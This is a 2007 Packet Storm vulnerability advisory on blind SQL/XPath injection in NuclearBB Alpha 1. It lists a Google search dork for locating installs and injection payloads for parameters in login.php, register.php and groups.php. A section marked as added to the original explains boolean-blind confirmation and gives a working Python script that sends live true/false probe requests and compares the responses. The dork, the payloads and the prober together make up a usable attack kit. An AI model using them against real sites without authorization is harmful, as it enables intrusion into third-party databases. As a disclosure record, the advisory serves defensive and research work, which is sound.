nuclearbb-sql.txt

2007-04-19T00:00:00
ID PACKETSTORM:56069
Type packetstorm
Reporter John Martinelli
Modified 2007-04-19T00:00:00

Description

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
  
Vulnerable: NuclearBB Alpha 1  
Google d0rk: "This forum is powered by NuclearBB"  
  
  
=============  
String Inputs  
=============  
  
----------------------------  
login.php - $_POST['submit']  
----------------------------  
  
username=xyz  
password=passxyz  
submit=Login"+and+"1"="0  
  
--------------------------------  
register.php - $_POST['website']  
--------------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com  
pass1=passwordxyz  
pass2=passwordxyz  
website=xyz@xyz.com"+and+"1"="0  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com  
icq=xyz@xyz.com  
signature=xyz@xyz.com  
coppa_state=over  
register_submit=Register  
  
----------------------------  
register.php - $_POST['aol']  
----------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com  
pass1=xyz@xyz.com  
pass2=xyz@xyz.com  
website=xyz@xyz.com  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com"+and+"1"="0  
icq=xyz@xyz.com  
signature=xyz@xyz.com  
coppa_state=over  
register_submit=Register  
  
----------------------------------  
register.php - $_POST['signature']  
----------------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com  
pass1=xyz@xyz.com  
pass2=xyz@xyz.com  
website=xyz@xyz.com  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com  
icq=xyz@xyz.com  
signature=xyz@xyz.com"+and+"1"="0  
coppa_state=over  
register_submit=Register  
  
==============  
Numeric Inputs  
==============  
  
-----------------------  
groups.php - $_GET['g']  
-----------------------  
  
http://www.example.com/groups.php?g=1+and+1=0  
  
------------------------------  
register.php - $_POST['email']  
------------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com+and+1=0  
pass1=xyz@xyz.com  
pass2=xyz@xyz.com  
website=xyz@xyz.com  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com  
icq=xyz@xyz.com  
signature=xyz@xyz.com  
coppa_state=over  
register_submit=Register  
  
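The advisory lists only the always-false probe for each parameter. To confirm a boolean-blind injection you send the same request three times (unmodified, with an always-true probe, with an always-false probe) and check that only the false variant changes the page; if both probes change it, the input was most likely just rejected. The string probe `" and "1"="0` closes a double-quoted literal and is equally valid inside an SQL WHERE clause and an XPath predicate, which is why the title covers both; the numeric probe ` and 1=0` targets a bare integer. The script below is an added example, not part of the original advisory: it builds the true/false pair for a parameter, URL-encodes it the way the advisory shows (the `+` in the payloads is an encoded space), and compares responses after masking per-request noise. The target URL, form fields and sample responses are constructed for illustration and were not run against NuclearBB.

```python
"""Boolean-based blind injection probe builder for the parameters listed in
the advisory above.  Added example, not part of the original advisory.
URL, form fields and sample responses are constructed for illustration."""
import re
import urllib.parse
import urllib.request
from typing import Dict, Tuple

# Probe suffixes as (always_true, always_false).  The advisory lists only the
# always-false form; the always-true form of the same shape is what lets us
# distinguish an injectable parameter from a page that merely rejects odd input.
STRING_PROBES = ('" and "1"="1', '" and "1"="0')   # closes a double-quoted literal
NUMERIC_PROBES = (' and 1=1', ' and 1=0')          # bare integer context


def build_probe_pair(params: Dict[str, str], target: str,
                     numeric: bool = False) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Return (true_variant, false_variant) of the form body: the probe is
    appended to `target`, every other field is sent unchanged."""
    true_sfx, false_sfx = NUMERIC_PROBES if numeric else STRING_PROBES
    base = params[target]
    return (dict(params, **{target: base + true_sfx}),
            dict(params, **{target: base + false_sfx}))


def encode_body(params: Dict[str, str]) -> str:
    """application/x-www-form-urlencoded body; spaces become '+' and '"'
    becomes %22, which is the form the advisory's payloads take on the wire."""
    return urllib.parse.urlencode(params)


def normalize(body: str) -> str:
    """Mask values that legitimately change between requests (session ids,
    CSRF tokens, clock times) so they do not produce false differences."""
    body = re.sub(r'(?i)\b(sid|sessid|sessionid|token)=[0-9a-f]+', r'\1=X', body)
    body = re.sub(r'\b\d{1,2}:\d{2}(?::\d{2})?\b', 'HH:MM', body)
    return body


def is_injectable(baseline: str, true_resp: str, false_resp: str) -> bool:
    """Boolean-blind oracle.  A real injection point makes the always-true
    probe a no-op (same page as baseline) while the always-false probe
    changes the result; if both probes differ from baseline the input was
    probably just rejected or broke the query outright."""
    b, t, f = (normalize(x) for x in (baseline, true_resp, false_resp))
    return t == b and f != b


def post(url: str, params: Dict[str, str], timeout: float = 10.0) -> str:
    """Send one form POST and return the response body as text."""
    req = urllib.request.Request(url, data=encode_body(params).encode(),
                                 method='POST')
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode('utf-8', errors='replace')


def probe(url: str, params: Dict[str, str], target: str,
          numeric: bool = False) -> bool:
    """Live check of one parameter: baseline, then the true/false pair."""
    baseline = post(url, params)
    true_body, false_body = build_probe_pair(params, target, numeric)
    return is_injectable(baseline, post(url, true_body), post(url, false_body))


if __name__ == '__main__':
    # Offline demonstration with constructed responses (no server involved).
    login = {'username': 'xyz', 'password': 'passxyz', 'submit': 'Login'}
    t, f = build_probe_pair(login, 'submit')
    print(encode_body(f))   # ...&submit=Login%22+and+%221%22%3D%220, as in the advisory

    page_with_rows = '<h1>Groups</h1><li>Admins</li><p>sid=c0ffee 12:01</p>'
    page_without = '<h1>Groups</h1><p>sid=deadbe 12:02</p>'
    print(is_injectable(page_with_rows, page_with_rows, page_without))  # True
    print(is_injectable(page_with_rows, page_without, page_without))    # False
    # Live check against an assumed host: probe('http://host/login.php', login, 'submit')
```

For the GET case (`groups.php?g=1`) the same pair applies with `numeric=True` and the body appended to the query string instead of the POST data. Run the baseline request twice before trusting the oracle: if two unmodified requests already differ after `normalize`, extend the masking before drawing any conclusion.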
  
John Martinelli  
john@martinelli.com  
http://john-martinelli.com  
  
April 18th, 2007  